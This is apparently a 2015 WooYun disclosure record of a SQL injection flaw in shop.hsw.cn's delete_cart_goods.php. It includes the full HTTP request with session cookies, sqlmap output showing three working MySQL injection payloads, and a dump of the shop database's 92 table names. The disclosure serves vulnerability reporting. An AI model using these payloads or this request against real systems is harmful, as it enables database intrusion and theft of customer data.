当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148452

漏洞标题:华商网某站存在SQL注入

相关厂商:hsw.cn

漏洞作者: 深度安全实验室

提交时间:2015-10-22 09:39

修复时间:2015-12-06 09:58

公开时间:2015-12-06 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-22: 细节已通知厂商并且等待厂商处理中
2015-10-22: 厂商已经确认,细节仅向厂商公开
2015-11-01: 细节向核心白帽子及相关领域专家公开
2015-11-11: 细节向普通白帽子公开
2015-11-21: 细节向实习白帽子公开
2015-12-06: 细节向公众公开

简要描述:

详细说明:

POST /delete_cart_goods.php HTTP/1.1
Content-Length: 8
Content-Type: application/x-www-form-urlencoded
Referer: http://shop.hsw.cn
Cookie: ECS_ID=de0274a92a99737ba31bb993571ca80d1ead0780; ECS[visit_times]=1; ECS[display]=grid; ECS[history]=123%2C179; ECSCP_ID=7ca343b036c08cfc9b0c4c4ec4861e7377cbe7ad
Host: shop.hsw.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
id=1

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=1 RLIKE (SELECT (CASE WHEN (9278=9278) THEN 1 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1 AND EXTRACTVALUE(8010,CONCAT(0x5c,0x7176787671,(SELECT (ELT(8010=8010,1))),0x7162707671))
Type: AND/OR time-based blind
Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
Payload: id=1 AND 8196=BENCHMARK(5000000,MD5(0x4464764c))
---
back-end DBMS: MySQL 5.1
Database: shop
[92 tables]
+-------------------------+
| ecs_account_log |
| ecs_ad |
| ecs_ad_custom |
| ecs_ad_position |
| ecs_admin_action |
| ecs_admin_log |
| ecs_admin_message |
| ecs_admin_user |
| ecs_adsense |
| ecs_affiliate_log |
| ecs_agency |
| ecs_alipay_log |
| ecs_area_region |
| ecs_article |
| ecs_article_cat |
| ecs_attribute |
| ecs_auction_log |
| ecs_auto_manage |
| ecs_back_goods |
| ecs_back_order |
| ecs_bonus_type |
| ecs_booking_goods |
| ecs_brand |
| ecs_card |
| ecs_cart |
| ecs_cat_recommend |
| ecs_category |
| ecs_collect_goods |
| ecs_comment |
| ecs_crons |
| ecs_delivery_goods |
| ecs_delivery_order |
| ecs_email_list |
| ecs_email_sendlist |
| ecs_error_log |
| ecs_exchange_goods |
| ecs_favourable_activity |
| ecs_feedback |
| ecs_friend_link |
| ecs_goods |
| ecs_goods_activity |
| ecs_goods_article |
| ecs_goods_attr |
| ecs_goods_cat |
| ecs_goods_gallery |
| ecs_goods_type |
| ecs_group_goods |
| ecs_keywords |
| ecs_link_goods |
| ecs_mail_templates |
| ecs_member_price |
| ecs_nav |
| ecs_order_action |
| ecs_order_goods |
| ecs_order_info |
| ecs_order_jifen |
| ecs_order_message |
| ecs_pack |
| ecs_package_goods |
| ecs_pay_log |
| ecs_payment |
| ecs_plugins |
| ecs_products |
| ecs_rcq_info |
| ecs_reg_extend_info |
| ecs_reg_fields |
| ecs_region |
| ecs_role |
| ecs_searchengine |
| ecs_sessions |
| ecs_sessions_data |
| ecs_shipping |
| ecs_shipping_area |
| ecs_shop_config |
| ecs_snatch_log |
| ecs_stats |
| ecs_suppliers |
| ecs_tag |
| ecs_template |
| ecs_topic |
| ecs_user_account |
| ecs_user_address |
| ecs_user_bonus |
| ecs_user_feed |
| ecs_user_rank |
| ecs_users |
| ecs_virtual_card |
| ecs_volume_price |
| ecs_vote |
| ecs_vote_log |
| ecs_vote_option |
| ecs_wholesale |
+-------------------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-10-22 09:57

厂商回复:

正在处理

最新状态:

暂无


漏洞评价:

评价